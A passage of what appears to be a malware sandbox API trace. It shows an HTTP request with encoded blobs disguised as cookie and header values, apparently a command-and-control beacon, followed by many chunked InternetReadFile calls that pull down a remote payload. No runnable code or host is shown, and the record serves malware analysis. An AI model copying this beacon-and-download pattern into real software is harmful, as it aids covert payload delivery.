HSID=cFcTO%2FN4iI6zY3IkaXgXZFB%2BrpbMSLlCkzhVtkn3Dw1Era9c1D7TRGG6e2i%2BA%2F4QFJ1NARtrIz19YW9OX6gToAVuCp9U9eMF8bv7pO%2B3B%2FjhVRQtPWGMxDKUSWZs85YXkD4KjuPAOO89hekOjtA1Z1r6D9xIKX%2FQ5MN6tJKRjvaV54CTriLps3HgcObuA8K%2FT5QO%2FUrBok4ht%2FC6f30DXJjaH5Xn5wLqej1cD9eAQbGX69abfEyPRbGGjFfCseF2mfR9dRC3JfQUN9eH2mHRcJgRpULBQ3xDvcgtcfR%2BiNe7mSs2PQX3p49khCdILom84UclfT0r%2B9uGb6U5WdTpPw%3D%3D;CGIC=gq8ZNbDF5ks85z4P%2BIMaH%2FzRLe46r7%2F%2Bhnn%2FpDJO9YmEXgEQh2yDpRm3wm6yEc8nw0QU9K1eeO0FbnVhhYzuhW9U2CPf4r9Sa0ADgwo6ZchGF7aQeC26N6C%2FCCbYOrfYNipK%2B2Zc6aerq5aAq%2F5DlAaVWkC3UqSbjwPa87rS4RRJ%2FgQ%2BhUe9KG7SMycbxOmDLWgMm5AorosFNcYgqAbxdUeyPWj58HkitgRmQpb0AnoipNS8s%2BRYlVzgQTpYz2w2ApzBXhbNaHx6H%2BPNhSnIBxjhUJh%2BEnfERdY3%2FereScY2VGlOIu9kQN2qSQB6cX%2FydHVs9oYSGgbalJ9%2FKRtZmA%3D%3D;DV=rbRs7Kwum7yFbPFLH1NE2rjyrBX1iaMxcUd4IAxR3QkVlRi51wc091UqVaDKdz%2BpTz%2FbL%2BVZhsmWoz2g2Xgb%2BFzfk12Yf3NU1xVj6c%2B143X8qFwS1dlCNFUbYXwQdFI7ZgHQxraLzNMjXYCYhhg7C47EFej32JknUm9g2YBq0ADG1xqtGv7XnzE4yb02aWUXhQ8sA8ic0fjQWELZNp1G7WUnHGpGUJLlgIAzTjRWORMxzLCGlpnPUuEeTFWW7WYIRFDTv08TJlTgi3%2BqbyG7ElLS4YvRojQ%2F0o7MhHYSScah%2BdAbg%2FLnsA8xyrzhYT0LEdXk0BgPkjyYGSZG1CwuPg%3D%3D;ANID=yDGNghH7ddRuBJtNp%2Fo1T4o%2FJbdTkGIgmT3kcpI38m9EUO8mVzXDzsUgmfz3Fcjh4Y4ehmqe5K9Xrf3BY2Z7Nu46fkefDS%2FJNkcokXYXJLWSiJOXW8obvErhIaQ7wqr3Djn9%2F3G%2BNPk%2BTmHr9%2FZIwuflBRrleWftdkqTw45Js6kM9FuvqlYN1YunukL2Q3rREJ%2FaF7tCdGnaeQL5u58%2BOBql0O3MMYb720Cf0%2BXjjLw2aq7zxg%2FfbKzWY7OOhd0QKQVWWvwIgYai01wKQ%2BiCY2cZax1xhwuK3t9C4pd2gImq2Y95xFE1n8EmlTLZuFjCKBt1e1xKKBPx8xAp7mwZ2g%3D%3D;\r\nVar: loY7P0M8SqcOPl%2BXVJh0gjNsyRAbgJGlHC%2FO9LThbjgrcsDxm4f5id64Ek3tmApcbZasWftr7erchqfSSQec%2Bw9rhuMIxW%2FAn6LtjUwb04d8t4ElBGTnlNL4NwAv5%2FaMECdCn1I5CD13zrWM2mdy52aPBmbQ4FCFTAEdMzUmtF27nKX9JFXqiS%2FwHdlrOOaKVpzpMKWuDUFDQrTzou1Upwcz1AW46pMVPyDJHTatGVr%2F1MgxNlI3c3lteLbxbpwn7y4quiwiWD%2FuIF0loJNxXMqx%2FQZG09nvMU97WiI1cJykoxFm27evIb84pXiT3XCETLDljkJKTnNvRPMQjiR0cw%3D%3D\r\nX-Tag: %2BRXdivW6tc1nF5bX2fkB3sAQAQhIie74226QvoLXFlHEAqoYfPHXaxF4ArvQLCXfq9PofpoF8OKd3vkblKGMH6zw7MtYu9yBgh%2BHXhZqeHJGnPGREOhAk9uNgnd5Owwk6IM5e1xLgr%2Bh2UPduNwit1GPyBD%2FJM8KKNySjjZdM6xDCGE7netphJKj5HlBjbuOpgHnBBFQKa0OoX%2FH22VU33w9o7BsjQ8WcUh9yWTGPA4sFSStXFnr9yN457C7UzAicu%2B1OFWoWumVNERz7WgJ6rOnuy7XpCl3AFFAAQooE4Mb%2FgtkZf9x42yo1jdInGBwYfj%2BVtHaMSFxhk0nTWooJA%3D%3D\r\nVary: iDcbusgPcI%2B9J48PSBM1LFqfLJw626%2BBtihZNtil17K%2BNQH%2BwXMUnsCqbgjyTzasu%2F6VmD2LqHEhexEHsbRHFFKDDZ7QYJev6XfTFJO5JJVs3Si%2BUUamI4Zv7E2oZK39azQJmDK8cWLRdF2qcNESTL5p4ombEvdZc4JieRFVvdbNauaOTPfPxAcU4cbo%2BSIVOEuD1w8F%2BkKDGshFgiK%2FVVneyInYSau5kCpChR5RdNZGIyCTtdsjad1yypUJ7YeF1ImgISsxQ%2FhRo7DOY7dp%2BmAd1h%2BQMXSURP5BDFPlX5W%2FSTQMi%2BPb7T2MDnK9Gf%2BK1a%2FukeydTpcJEYk1RGeJsw%3D%3D\r\n", dwHeadersLength=0xa82, lpOptional=0x0*, dwOptionalLength=0x0) returned 1 [0169.035] GetProcAddress (hModule=0x7ffc51070000, lpProcName="HttpQueryInfoA") returned 0x7ffc510f2880 [0169.035] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x14f8e8, lpdwBufferLength=0x14f8ec, lpdwIndex=0x0 | out: lpBuffer=0x14f8e8*, lpdwBufferLength=0x14f8ec*=0x4, lpdwIndex=0x0) returned 1 [0169.035] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetQueryDataAvailable") returned 0x7ffc51094890 [0169.035] InternetQueryDataAvailable (hFile=0xcc000c, lpdwNumberOfBytesAvailable=0x14f8a0, dwFlags=0x0, dwContext=0x0) returned 1 [0169.037] GetProcessHeap () returned 0x440000 [0169.037] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x224) returned 0x24cb390 [0169.037] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetReadFile") returned 0x7ffc510ddec0 [0169.037] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x24cb390, dwNumberOfBytesToRead=0x224, lpdwNumberOfBytesRead=0x14f8a4 | out: lpBuffer=0x24cb390*, lpdwNumberOfBytesRead=0x14f8a4*=0x224) returned 1 [0169.037] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetQueryDataAvailable") returned 0x7ffc51094890 [0169.037] InternetQueryDataAvailable (hFile=0xcc000c, lpdwNumberOfBytesAvailable=0x14f8a0, dwFlags=0x0, dwContext=0x0) returned 1 [0169.038] GetProcessHeap () returned 0x440000 [0169.038] RtlReAllocateHeap (Heap=0x440000, Flags=0x0, Ptr=0x24cb390, Size=0xe29) returned 0x3a45200 [0169.038] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetReadFile") returned 0x7ffc510ddec0 [0169.038] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3a45424, dwNumberOfBytesToRead=0xc05, lpdwNumberOfBytesRead=0x14f8a4 | out: lpBuffer=0x3a45424*, lpdwNumberOfBytesRead=0x14f8a4*=0xc05) returned 1 [0169.038] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetQueryDataAvailable") returned 0x7ffc51094890 [0169.038] InternetQueryDataAvailable (hFile=0xcc000c, lpdwNumberOfBytesAvailable=0x14f8a0, dwFlags=0x0, dwContext=0x0) returned 1 [0169.039] GetProcessHeap () returned 0x440000 [0169.039] RtlReAllocateHeap (Heap=0x440000, Flags=0x0, Ptr=0x3a45200, Size=0x2e29) returned 0x4ec830 [0169.040] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetReadFile") returned 0x7ffc510ddec0 [0169.040] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x4ed659, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x14f8a4 | out: lpBuffer=0x4ed659*, lpdwNumberOfBytesRead=0x14f8a4*=0x2000) returned 1 [0169.040] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetQueryDataAvailable") returned 0x7ffc51094890 [0169.040] InternetQueryDataAvailable (hFile=0xcc000c, lpdwNumberOfBytesAvailable=0x14f8a0, dwFlags=0x0, dwContext=0x0) returned 1 [0169.040] GetProcessHeap () returned 0x440000 [0169.040] RtlReAllocateHeap (Heap=0x440000, Flags=0x0, Ptr=0x4ec830, Size=0x4e29) returned 0x525100 [0169.041] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetReadFile") returned 0x7ffc510ddec0 [0169.041] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x527f29, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x14f8a4 | out: lpBuffer=0x527f29*, lpdwNumberOfBytesRead=0x14f8a4*=0x2000) returned 1 [0169.042] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetQueryDataAvailable") returned 0x7ffc51094890 [0169.042] InternetQueryDataAvailable (hFile=0xcc000c, lpdwNumberOfBytesAvailable=0x14f8a0, dwFlags=0x0, dwContext=0x0) returned 1 [0169.042] GetProcessHeap () returned 0x440000 [0169.042] RtlReAllocateHeap (Heap=0x440000, Flags=0x0, Ptr=0x525100, Size=0x6e29) returned 0x525100 [0169.042] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetReadFile") returned 0x7ffc510ddec0 [0169.042] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x529f29, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x14f8a4 | out: lpBuffer=0x529f29*, lpdwNumberOfBytesRead=0x14f8a4*=0x2000) returned 1 [0169.043] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetQueryDataAvailable") returned 0x7ffc51094890 [0169.043] InternetQueryDataAvailable (hFile=0xcc000c, lpdwNumberOfBytesAvailable=0x14f8a0, dwFlags=0x0, dwContext=0x0) returned 1 [0169.043] GetProcessHeap () returned 0x440000 [0169.043] RtlReAllocateHeap (Heap=0x440000, Flags=0x0, Ptr=0x525100, Size=0x7e29) returned 0x525100 [0169.043] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetReadFile") returned 0x7ffc510ddec0 [0169.043] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x52bf29, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x14f8a4 | out: lpBuffer=0x52bf29*, lpdwNumberOfBytesRead=0x14f8a4*=0x1000) returned 1 [0169.043] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetQueryDataAvailable") returned 0x7ffc51094890 [0169.043] InternetQueryDataAvailable (hFile=0xcc000c, lpdwNumberOfBytesAvailable=0x14f8a0, dwFlags=0x0, dwContext=0x0) returned 1 [0169.044] GetProcessHeap () returned 0x440000 [0169.044] RtlReAllocateHeap (Heap=0x440000, Flags=0x0, Ptr=0x525100, Size=0x8e29) returned 0x525100 [0169.044] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetReadFile") returned 0x7ffc510ddec0 [0169.044] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x52cf29, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x14f8a4 | out: lpBuffer=0x52cf29*, lpdwNumberOfBytesRead=0x14f8a4*=0x1000) returned 1 [0169.044] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetQueryDataAvailable") returned 0x7ffc51094890 [0169.044] InternetQueryDataAvailable (hFile=0xcc000c, lpdwNumberOfBytesAvailable=0x14f8a0, dwFlags=0x0, dwContext=0x0) returned 1 [0169.045] GetProcessHeap () returned 0x440000 [0169.045] RtlReAllocateHeap (Heap=0x440000, Flags=0x0, Ptr=0x525100, Size=0xae29) returned 0x2443010 [0169.047] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetReadFile") returned 0x7ffc510ddec0 [0169.047] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x244be39, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x14f8a4 | out: lpBuffer=0x244be39*, lpdwNumberOfBytesRead=0x14f8a4*=0x2000) returned 1 [0169.047] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetQueryDataAvailable") returned 0x7ffc51094890 [0169.047] InternetQueryDataAvailable (hFile=0xcc000c, lpdwNumberOfBytesAvailable=0x14f8a0, dwFlags=0x0, dwContext=0x0) returned 1 [0169.047] GetProcessHeap () returned 0x440000 [0169.047] RtlReAllocateHeap (Heap=0x440000, Flags=0x0, Ptr=0x2443010, Size=0xce29) returned 0x2443010 [0169.048] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetReadFile") returned 0x7ffc510ddec0 [0169.048] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x244de39, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x14f8a4 | out: lpBuffer=0x244de39*, lpdwNumberOfBytesRead=0x14f8a4*=0x2000) returned 1 [0169.048] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetQueryDataAvailable") returned 0x7ffc51094890 [0169.048] InternetQueryDataAvailable (hFile=0xcc000c, lpdwNumberOfBytesAvailable=0x14f8a0, dwFlags=0x0, dwContext=0x0) returned 1 [0169.049] GetProcessHeap () returned 0x440000 [0169.049] RtlReAllocateHeap (Heap=0x440000, Flags=0x0, Ptr=0x2443010, Size=0xee29) returned 0x2443010 [0169.049] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetReadFile") returned 0x7ffc510ddec0 [0169.049] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x244fe39, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x14f8a4 | out: lpBuffer=0x244fe39*, lpdwNumberOfBytesRead=0x14f8a4*=0x2000) returned 1 [0169.049] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetQueryDataAvailable") returned 0x7ffc51094890 [0169.049] InternetQueryDataAvailable (hFile=0xcc000c, lpdwNumberOfBytesAvailable=0x14f8a0, dwFlags=0x0, dwContext=0x0) returned 1 [0169.050] GetProcessHeap () returned 0x440000 [0169.050] RtlReAllocateHeap (Heap=0x440000, Flags=0x0, Ptr=0x2443010, Size=0xfe29) returned 0x2443010 [0169.050] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetReadFile") returned 0x7ffc510ddec0 [0169.050] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2451e39, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x14f8a4 | out: lpBuffer=0x2451e39*, lpdwNumberOfBytesRead=0x14f8a4*=0x1000) returned 1 [0169.050] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetQueryDataAvailable") returned 0x7ffc51094890 [0169.050] InternetQueryDataAvailable (hFile=0xcc000c, lpdwNumberOfBytesAvailable=0x14f8a0, dwFlags=0x0, dwContext=0x0) returned 1 [0169.050] GetProcessHeap () returned 0x440000 [0169.050] RtlReAllocateHeap (Heap=0x440000, Flags=0x0, Ptr=0x2443010, Size=0x10e29) returned 0x2443010 [0169.051] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetReadFile") returned 0x7ffc510ddec0 [0169.051] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2452e39, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x14f8a4 | out: lpBuffer=0x2452e39*, lpdwNumberOfBytesRead=0x14f8a4*=0x1000) returned 1 [0169.051] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetQueryDataAvailable") returned 0x7ffc51094890 [0169.051] InternetQueryDataAvailable (hFile=0xcc000c, lpdwNumberOfBytesAvailable=0x14f8a0, dwFlags=0x0, dwContext=0x0) returned 1 [0169.051] GetProcessHeap () returned 0x440000 [0169.051] RtlReAllocateHeap (Heap=0x440000, Flags=0x0, Ptr=0x2443010, Size=0x12e29) returned 0x2443010 [0169.052] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetReadFile") returned 0x7ffc510ddec0 [0169.052] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2453e39, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x14f8a4 | out: lpBuffer=0x2453e39*, lpdwNumberOfBytesRead=0x14f8a4*=0x2000) returned 1 [0169.052] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetQueryDataAvailable") returned 0x7ffc51094890 [0169.052] InternetQueryDataAvailable (hFile=0xcc000c, lpdwNumberOfBytesAvailable=0x14f8a0, dwFlags=0x0, dwContext=0x0) returned 1 [0169.053] GetProcessHeap () returned 0x440000 [0169.053] RtlReAllocateHeap (Heap=0x440000, Flags=0x0, Ptr=0x2443010, Size=0x14e29) returned 0x2443010 [0169.053] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetReadFile") returned 0x7ffc510ddec0 [0169.053] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2455e39, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x14f8a4 | out: lpBuffer=0x2455e39*, lpdwNumberOfBytesRead=0x14f8a4*=0x2000) returned 1 [0169.054] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetQueryDataAvailable") returned 0x7ffc51094890 [0169.054] InternetQueryDataAvailable (hFile=0xcc000c, lpdwNumberOfBytesAvailable=0x14f8a0, dwFlags=0x0, dwContext=0x0) returned 1 [0169.054] GetProcessHeap () returned 0x440000 [0169.054] RtlReAllocateHeap (Heap=0x440000, Flags=0x0, Ptr=0x2443010, Size=0x16e29) returned 0x2443010 [0169.055] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetReadFile") returned 0x7ffc510ddec0 [0169.067] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2457e39, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x14f8a4 | out: lpBuffer=0x2457e39*, lpdwNumberOfBytesRead=0x14f8a4*=0x2000) returned 1 [0169.069] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetQueryDataAvailable") returned 0x7ffc51094890 [0169.069] InternetQueryDataAvailable (hFile=0xcc000c, lpdwNumberOfBytesAvailable=0x14f8a0, dwFlags=0x0, dwContext=0x0) returned 1 [0169.070] GetProcessHeap () returned 0x440000 [0169.070] RtlReAllocateHeap (Heap=0x440000, Flags=0x0, Ptr=0x2443010, Size=0x17e29) returned 0x2443010 [0169.070] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetReadFile") returned 0x7ffc510ddec0 [0169.070] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2459e39, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x14f8a4 | out: lpBuffer=0x2459e39*, lpdwNumberOfBytesRead=0x14f8a4*=0x1000) returned 1 [0169.070] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetQueryDataAvailable") returned 0x7ffc51094890 [0169.070] InternetQueryDataAvailable (hFile=0xcc000c, lpdwNumberOfBytesAvailable=0x14f8a0, dwFlags=0x0, dwContext=0x0) returned 1 [0169.071] GetProcessHeap () returned 0x440000 [0169.071] RtlReAllocateHeap (Heap=0x440000, Flags=0x0, Ptr=0x2443010, Size=0x18e29) returned 0x2443010 [0169.071] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetReadFile") returned 0x7ffc510ddec0 [0169.071] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x245ae39, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x14f8a4 | out: lpBuffer=0x245ae39*, lpdwNumberOfBytesRead=0x14f8a4*=0x1000) returned 1 [0169.071] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetQueryDataAvailable") returned 0x7ffc51094890 [0169.071] InternetQueryDataAvailable (hFile=0xcc000c, lpdwNumberOfBytesAvailable=0x14f8a0, dwFlags=0x0, dwContext=0x0) returned 1 [0169.072] GetProcessHeap () returned 0x440000 [0169.072] RtlReAllocateHeap (Heap=0x440000, Flags=0x0, Ptr=0x2443010, Size=0x1ae29) returned 0x20f7520 [0169.075] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetReadFile") returned 0x7ffc510ddec0 [0169.075] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2110349, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x14f8a4 | out: lpBuffer=0x2110349*, lpdwNumberOfBytesRead=0x14f8a4*=0x2000) returned 1 [0169.075] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetQueryDataAvailable") returned 0x7ffc51094890 [0169.075] InternetQueryDataAvailable (hFile=0xcc000c, lpdwNumberOfBytesAvailable=0x14f8a0, dwFlags=0x0, dwContext=0x0) returned 1 [0169.076] GetProcessHeap () returned 0x440000 [0169.076] RtlReAllocateHeap (Heap=0x440000, Flags=0x0, Ptr=0x20f7520, Size=0x1ce29) returned 0x20f7520 [0169.076] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetReadFile") returned 0x7ffc510ddec0 [0169.076] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2112349, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x14f8a4 | out: lpBuffer=0x2112349*, lpdwNumberOfBytesRead=0x14f8a4*=0x2000) returned 1 [0169.076] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetQueryDataAvailable") returned 0x7ffc51094890 [0169.076] InternetQueryDataAvailable (hFile=0xcc000c, lpdwNumberOfBytesAvailable=0x14f8a0, dwFlags=0x0, dwContext=0x0) returned 1 [0169.077] GetProcessHeap () returned 0x440000 [0169.077] RtlReAllocateHeap (Heap=0x440000, Flags=0x0, Ptr=0x20f7520, Size=0x1ee29) returned 0x24ecf00 [0169.080] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetReadFile") returned 0x7ffc510ddec0 [0169.080] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2509d29, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x14f8a4 | out: lpBuffer=0x2509d29*, lpdwNumberOfBytesRead=0x14f8a4*=0x2000) returned 1 [0169.297] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetQueryDataAvailable") returned 0x7ffc51094890 [0169.298] InternetQueryDataAvailable (hFile=0xcc000c, lpdwNumberOfBytesAvailable=0x14f8a0, dwFlags=0x0, dwContext=0x0) returned 1 [0169.298] GetProcessHeap () returned 0x440000 [0169.298] RtlReAllocateHeap (Heap=0x440000, Flags=0x0, Ptr=0x24ecf00, Size=0x1fe29) returned 0x24ecf00 [0169.298] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetReadFile") returned 0x7ffc510ddec0 [0169.299] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x250bd29, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x14f8a4 | out: lpBuffer=0x250bd29*, lpdwNumberOfBytesRead=0x14f8a4*=0x1000) returned 1 [0169.299] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetQueryDataAvailable") returned 0x7ffc51094890 [0169.299] InternetQueryDataAvailable (hFile=0xcc000c, lpdwNumberOfBytesAvailable=0x14f8a0, dwFlags=0x0, dwContext=0x0) returned 1 [0169.299] GetProcessHeap () returned 0x440000 [0169.299] RtlReAllocateHeap (Heap=0x440000, Flags=0x0, Ptr=0x24ecf00, Size=0x20e29) returned 0x24ecf00 [0169.300] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetReadFile") returned 0x7ffc510ddec0 [0169.300] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x250cd29, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x14f8a4 | out: lpBuffer=0x250cd29*, lpdwNumberOfBytesRead=0x14f8a4*=0x1000) returned 1 [0169.300] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetQueryDataAvailable") returned 0x7ffc51094890 [0169.300] InternetQueryDataAvailable (hFile=0xcc000c, lpdwNumberOfBytesAvailable=0x14f8a0, dwFlags=0x0, dwContext=0x0) returned 1 [0169.300] GetProcessHeap () returned 0x440000 [0169.300] RtlReAllocateHeap (Heap=0x440000, Flags=0x0, Ptr=0x24ecf00, Size=0x22e29) returned 0x24ecf00 [0169.301] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetReadFile") returned 0x7ffc510ddec0 [0169.301] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x250dd29, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x14f8a4 | out: lpBuffer=0x250dd29*, lpdwNumberOfBytesRead=0x14f8a4*=0x2000) returned 1 [0169.301] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetQueryDataAvailable") returned 0x7ffc51094890 [0169.301] InternetQueryDataAvailable (hFile=0xcc000c, lpdwNumberOfBytesAvailable=0x14f8a0, dwFlags=0x0, dwContext=0x0) returned 1 [0169.302] GetProcessHeap () returned 0x440000 [0169.302] RtlReAllocateHeap (Heap=0x440000, Flags=0x0, Ptr=0x24ecf00, Size=0x24e29) returned 0x24ecf00 [0169.302] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetReadFile") returned 0x7ffc510ddec0 [0169.302] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x250fd29, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x14f8a4 | out: lpBuffer=0x250fd29*, lpdwNumberOfBytesRead=0x14f8a4*=0x2000) returned 1 [0169.302] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetQueryDataAvailable") returned 0x7ffc51094890 [0169.302] InternetQueryDataAvailable (hFile=0xcc000c, lpdwNumberOfBytesAvailable=0x14f8a0, dwFlags=0x0, dwContext=0x0) returned 1 [0169.303] GetProcessHeap () returned 0x440000 [0169.303] RtlReAllocateHeap (Heap=0x440000, Flags=0x0, Ptr=0x24ecf00, Size=0x25e29) returned 0x24ecf00 [0169.303] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetReadFile") returned 0x7ffc510ddec0 [0169.303] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2511d29, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x14f8a4 | out: lpBuffer=0x2511d29*, lpdwNumberOfBytesRead=0x14f8a4*=0x1000) returned 1 [0169.303] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetQueryDataAvailable") returned 0x7ffc51094890 [0169.303] InternetQueryDataAvailable (hFile=0xcc000c, lpdwNumberOfBytesAvailable=0x14f8a0, dwFlags=0x0, dwContext=0x0) returned 1 [0169.304] GetProcessHeap () returned 0x440000 [0169.304] RtlReAllocateHeap (Heap=0x440000, Flags=0x0, Ptr=0x24ecf00, Size=0x27e29) returned 0x202b010 [0169.305] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetReadFile") returned 0x7ffc510ddec0 [0169.305] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2050e39, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x14f8a4 | out: lpBuffer=0x2050e39*, lpdwNumberOfBytesRead=0x14f8a4*=0x2000) returned 1 [0169.306] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetQueryDataAvailable") returned 0x7ffc51094890 [0169.306] InternetQueryDataAvailable (hFile=0xcc000c, lpdwNumberOfBytesAvailable=0x14f8a0, dwFlags=0x0, dwContext=0x0) returned 1 [0169.306] GetProcessHeap () returned 0x440000 [0169.306] RtlReAllocateHeap (Heap=0x440000, Flags=0x0, Ptr=0x202b010, Size=0x28e29) returned 0x202b010 [0169.306] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetReadFile") returned 0x7ffc510ddec0 [0169.306] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2052e39, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x14f8a4 | out: lpBuffer=0x2052e39*, lpdwNumberOfBytesRead=0x14f8a4*=0x1000) returned 1 [0169.307] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetQueryDataAvailable") returned 0x7ffc51094890 [0169.307] InternetQueryDataAvailable (hFile=0xcc000c, lpdwNumberOfBytesAvailable=0x14f8a0, dwFlags=0x0, dwContext=0x0) returned 1 [0169.307] GetProcessHeap () returned 0x440000 [0169.307] RtlReAllocateHeap (Heap=0x440000, Flags=0x0, Ptr=0x202b010, Size=0x2ae29) returned 0x202b010 [0169.308] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetReadFile") returned 0x7ffc510ddec0 [0169.308] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2053e39, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x14f8a4 | out: lpBuffer=0x2053e39*, lpdwNumberOfBytesRead=0x14f8a4*=0x2000) returned 1 [0169.308] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetQueryDataAvailable") returned 0x7ffc51094890 [0169.308] InternetQueryDataAvailable (hFile=0xcc000c, lpdwNumberOfBytesAvailable=0x14f8a0, dwFlags=0x0, dwContext=0x0) returned 1 [0169.308] GetProcessHeap () returned 0x440000 [0169.308] RtlReAllocateHeap (Heap=0x440000, Flags=0x0, Ptr=0x202b010, Size=0x2ce29) returned 0x202b010 [0169.309] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetReadFile") returned 0x7ffc510ddec0 [0169.309] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2055e39, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x14f8a4 | out: lpBuffer=0x2055e39*, lpdwNumberOfBytesRead=0x14f8a4*=0x2000) returned 1 [0169.309] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetQueryDataAvailable") returned 0x7ffc51094890 [0169.309] InternetQueryDataAvailable (hFile=0xcc000c, 